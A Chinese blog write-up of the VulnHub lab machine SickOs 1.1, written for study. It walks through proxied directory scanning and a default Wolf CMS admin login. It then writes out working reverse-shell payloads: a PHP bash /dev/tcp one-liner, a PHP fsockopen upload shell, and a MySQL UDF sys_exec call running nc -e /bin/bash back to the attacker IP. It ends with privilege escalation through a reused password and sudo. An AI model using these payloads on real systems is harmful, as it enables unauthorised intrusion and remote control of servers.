【SickOs1.1靶场渗透】

最新推荐文章于 2025-02-09 22:26:03 发布
最新推荐文章于 2025-02-09 22:26:03 发布
阅读量1.2k 收藏 23
点赞数 18
CC 4.0 BY-SA版权
分类专栏: 靶场渗透 文章标签: 靶场 网络安全 渗透测试 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_61872115/article/details/144471646

文章目录

一、基础信息

二、信息收集

三、反弹shell

四、提权

一、基础信息

Kali IP:192.168.20.146

靶机IP:192.168.20.150

二、信息收集

端口扫描

nmap -sS -sV -p- -A 192.168.20.150

开放了22、3128端口,8080端口显示关闭

22端口 openssh 5.9p1

3128端口 squid 3.1.19 //前面靶场遇到过,可能又要设置代理

直接目录扫描没有发现,设置一下代理访问服务器80端口发现有显示

设置代理扫描一下目录

dirsearch -u http://192.168.20.150/ --proxy=192.168.20.150:3128 -x 403

发现两个路径,访问一下

Robots文件显示了一个新路径:http://192.168.20.150/wolfcms/,为wolf cms

http://192.168.20.150/connect,好像没什么用

继续扫描一下上面wolfcms的目录文件

dirsearch -u http://192.168.20.150/wolfcms --proxy=192.168.20.150:3128 -x 403

其他路径访问了下好像没啥有用的

百度查找wolfcms默认后台登陆地址/?/admin拼接跳转成功

http://192.168.20.150/wolfcms/?/admin/login

弱口令admin:admin成功登录到后台

三、反弹shell

1、Php反弹shell

打开一个page页面发现可以编辑php代码,写入php代码反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.20.146/8080 0>&1'"); ?>

保存后刷新一下页面即可反弹shell

2、文件上传反弹shell

登录到系统后可以发现cms版本为0.8.2,搜索一下漏洞,发现有文件上传漏洞

找到文件上传点

上传shell.php

<?php
$sock=fsockopen('192.168.20.146',8080);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>

开启监听端口,访问http://192.168.20.146/wolfcms/public/shell.php,成功反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

四、提权

1、sudo提权需要账户密码,这里没有

2、尝试数据库udf提权

查看根目录信息,发现config.php文件,查看内容发现数据库信息

当前数据库:wolf,账户密码:root/john@123

登录到数据库查看到了admin的账户信息

但是解不出密码

UDF,即user defined function,在MySQL中,UDF允许用户创建自己的函数,这些函数可以在SQL查询语句中使用,类似于内置函数。通过使用UDF,用户可以对数据库进行自定义操作,以满足业务需求,或实现数据库本身并不支持的一些特定功能。
前提条件:
1、拥有MySQL数据库账号,且该账号对MySQL拥有create insert delete等权限,以创建和使用函数
2、secure_file_priv为空,若secure_file_priv指定的目录恰好是我们提权过程中用到的目录,也可以

show global variables like 'secure%';

secure_file_priv值为空则可写,可以考虑UDF提权

secure_file_priv值为指定路径,则指定路径可写

show variables like '%compile%';

可以看到系统版本,这可以确定等下我们要用的脚本。

select @@plugin_dir;                      #查找具体目录

select @@basedir;                       #查看mysql目录

kali上寻找exp

find / -name "*mysqludf*" 2>/dev/null

cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so /root

python -m http.server 8090

靶机上

cd /tmp

wget http://192.168.20.146:8090/lib_mysqludf_sys_64.so

提权操作

use mysql;
create table hack(line blob); #新建一个表,用来存放本地传来的udf文件的内容
insert into hack values(load_file('/tmp/lib_mysqludf_sys_64.so'));  #在hack中写入udf文件内容
select * from hack into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';  #将udf文件内容传入新建的udf文件中
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';  #导入udf函数
select sys_exec('nc 192.168.20.146 9090 -e /bin/bash'); #执行

但是在将udf文件内容传入新建的udf文件中时失败了,提示不能创建和写入文件,不知道咋回事,secure_file_priv值是为空的呀。

Mysql_udf提权失败

3、Suid位提权

find / -perm -u=s -type f 2>/dev/null

搜索了一下没有可利用的

4、内核提权

Uname -a

Cat /etc/*release

搜索漏洞

似乎没有有效的,尝试了几个也是没成功

只能继续收集信息

看到/etc/passwd文件里还有个用户,尝试用已知的数据库密码登录成功。

账户密码:sickos/john@123

发现可用sudo提权:sudo su,提权成功

sick0s1.1靶场 渗透思路
qq_52732967的博客
07-01 318
开启我们的目录爆破(注意要设置代理)//gobuster我搜了半天没找着开代理的方法网上的这个不行,如果大家有知道的可以分享一下,让我学习学习。瞅着像目录啊,进去后发现是一个cms,搜索其admin默认路劲以及登录密码,成功进入后台。但是在页尾位置有一个squid/3.1.19,很显然是一个什么组件之类的。目标机器开启的三个端口中,ssh权重最低,8080最高,3128不知道是啥玩意。后台有管理员的业务控制,插入我们的反弹shell(这块我环境坏了…只找到了dirb的,不过也是扫出来了。
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
vulnhub靶场SICKOS: 1.1
kukudeshuo的博客
12-07 4495
vulnhub靶场SICKOS: 1.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 攻击机:kali(192.168.109.128) 靶机:SICKOS: 1.1192.168.109.189) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.189 使用nmap扫描查看目标
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 2137
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
Vulhub sickos1.1靶机
小小猪的博客
06-11 228
Vulhub sickos1.1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.237 设置代理 访问http://x.x.x.237/robots.txt 访问/wolfcms目录 发现存在CMS。。。那么管理员界面呢? 发现files 面板下的权限 上传木马 访问http://x.x.x.237/wolfcms/public/shell.php,进行反弹 查看一下:$ cat /var/www/wolfcm.
红队渗透靶场SickOs1.1
xf555er的博客
12-06 1232
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
Vulnhub靶机系列:SickOs: 1.1
汗的博客
04-19 1268
这次的靶机是Vulnhub靶机: 靶机地址及相关描述 靶机设置 利用知识及工具 信息收集并getshell 提权 总结
vulhub sickos漏洞靶场搭建
最新发布
03-19
上述代码会展示 sickos 文件夹内的可用选项列表(如 `sickos_1.0`, `sickos_1.1` 等),选择其中一个进入子目录继续设置过程。 --- #### 启动容器服务 切换至选定的具体病态操作系统实例位置之后,只需简单调用 ...
oscp备考,oscp系列——sickos1.2靶场,PUT上传一句话木马,计划任务:chkrootkit 0.49 提权
2202_75361164的博客
02-09 905
oscp备考,oscp系列——sickos1.2靶场,PUT上传一句话木马,计划任务:chkrootkit 0.49 提权 难度简单 nmap 主机发现 端口扫描 vuln扫描 目录扫描 只扫出来一个test目录,存在目录穿越 lighttpd/1.4.28也没有什么漏洞 查看源码,有一个提示 尝试OpenSSH <= 6.6 SFTP漏洞 需要账号密码,失败 现在只剩下一个空的test目录,这里绝对有利用点,再次尝试收集,使用nmap进行test目录扫描 发现存在PUT方法,尝试 上传一句
OSCP Sickos 1.1 靶机渗透
Shadow的博客
03-23 394
Sickos 1.1 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-23 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Sickos 1.1主机ip为172.16.1.10 nmap 扫描一下 nmap -p- -A 172.16.1.10 主机开放了代理服务器,
vulhub——SickOs: 1.1
战神/calmness的博客
06-04 602
下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 目标机器地址:192.168.243.137 攻击机器地址:192.168.18.148 目录 信息收集 扫描 设置代理 wolfcms 上传木马 并且 访问 SSH登录 sudo提权 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt..
Vulnhub系列-sick0s1.1
Yasso的博客
01-01 3584
靶机:192.168.12.130 kali: 192.168.249.128 一、信息收集 nmap -sV 192.168.12.130 –扫描开放端口 3128端口是作为代理 dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录 扫到robots.txt Wolf CMS 后台管理:?/admin 一试就出来了–弱口令:admin/admin Wolfcms 0.8.2中存在任意文件上传漏洞 weevely是适用
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 536
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
渗透测试靶机----Sickos1.1
久恙502的博客
01-19 875
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
红队打靶:SickOS1.1详细打靶思路(vulnhub
Bossfrank的博客
06-07 2682
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
红队打靶:SickOS1.1详细打靶思路之shellshock漏洞利用(vulnhub
Bossfrank的博客
06-08 1173
本文详述了vulnhub靶机sickOS1.1的打靶过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打靶每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
红队靶场SickOS1.1复现过程,反弹shell,目录扫描代理转移
m0_58116751的博客
05-17 1948
它的默认登录页面是存在没有被更改,在渗透测试中想要进入后台,分三种,一是猜测尝试弱密码,一种就是字典爆破他的密码,然后就是在网页信息中去查找弄出他的密码,emmm,运气比较好尝试一下,admin,admin。也是列举出了他的很多账号,我们看到了 root sickos 还有当前用户www-data这几个重点用户,我们现在有密码有用户,登录凭证的条件都有了,根据大多人的习惯密码都是相同的那我们来尝试ssh连接吧。我们起手依旧是对于整个网段进行一个扫描,产看整个网段的存活情况来和IP端口的开放情况,
VulnHub-sick0s1.1-靶机渗透学习
嗯嗯呐的博客
12-06 836
靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并在其上获得管理/根目录特权。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 目录信息收集getshell提权利用shellshock获得shell总结 信息收集 Nmap 扫描靶机端口 nmap扫描靶机
Vulnhub 靶机 SickOs1.1 write up 配置squid代理,wolfcms getshell sudo提权
YouthBelief的博客
01-03 3941
0x00 环境准备 下载链接 https://download.vulnhub.com/sickos/sick0s1.1.7z 运行环境 Vmware 目标 root + flag 0x01 信息收集 靶机IP探测 nmap -sP 192.168.157.0/24 端口服务探测 nmap -sC -sV -A -p- 192.168.157.169 -o port.txt 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值